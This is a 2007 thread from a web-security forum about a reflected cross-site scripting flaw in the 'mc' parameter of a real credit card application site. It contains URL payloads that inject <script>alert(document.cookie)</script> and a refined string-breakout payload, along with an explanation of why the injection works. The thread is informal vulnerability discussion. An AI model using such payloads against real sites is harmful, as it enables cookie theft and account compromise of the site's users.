Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
can be bug?
Posted by: Fugitif
Date: November 04, 2007 02:52PM

ok,try in firefox:

https://wwwn.applyonlinenow.com/USCCapp/Ctl/entry?sc=FABDFB&mc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


I find this error:


Quote

"); cmTriggered = false; function triggerAppStart() { if (!cmTriggered) { cmTriggered = true; cmCreateApplicationTags("Application: CRD APP - ao Step: 150 (Your Information - Clicked)", "CRD APP - ao", "150", "Your Information - Clicked", false, false, "", false, "CARD:AOLN:USCC:ao", true, false, false, null, "8AMC FABDFB", "119420943891120", null, null, null, null, null, null, null, "BANK OF AMERICA WORLD MASTERCARDREG WITH WORLDPOINTS WORLDCARD MASTERCARD", "CREDITCARD", false); cmCreateConversionEventTag("App View to Start", "2", "Card - AOLN", "0", "Application: CRD APP - ao Step: 150 (Your Information - Clicked)", "8AMC FABDFB", "CRD APP - ao", null); cmCreateConversionEventTag("App Start to Submit", "1", "Card - AOLN", "0", "Application: CRD APP - ao Step: 150 (Your Information - Clicked)", "8AMC FABDFB", "CRD APP - ao", null); } } //-->


wtf is??



Edited 2 time(s). Last edit at 11/04/2007 02:52PM by Fugitif.

Options: ReplyQuote
Re: can be bug?
Posted by: DanielG
Date: November 05, 2007 02:36PM

You are injecting into the Javascript on the site, the 'bug' is that you supply the "</script>" which ends the script block and displays the rest of it as text.

If you look at line 182 in the source code you see

cmCreateProductDetailsTag("Application: CRD APP..bla...", "sourcecode:FABDFB", ""><script>alert(document.cookie)</script>");

The mc variable is blindly put into the javascript part of the page.

try hxxps://wwwn.applyonlinenow.com/USCCapp/Ctl/entry?sc=FABDFB&mc=%22);%20alert(%22mc

to get an alert with the text 'mc'.

Nice find for a site with "Bank of America World MasterCard®".

--
Yeah i'm Dutch, sweeeeeeeeeeet.

Options: ReplyQuote
Re: can be bug?
Date: December 17, 2007 08:25PM

cool.... though I don't know what you just did there -_-

Options: ReplyQuote


Sorry, only registered users may post in this forum.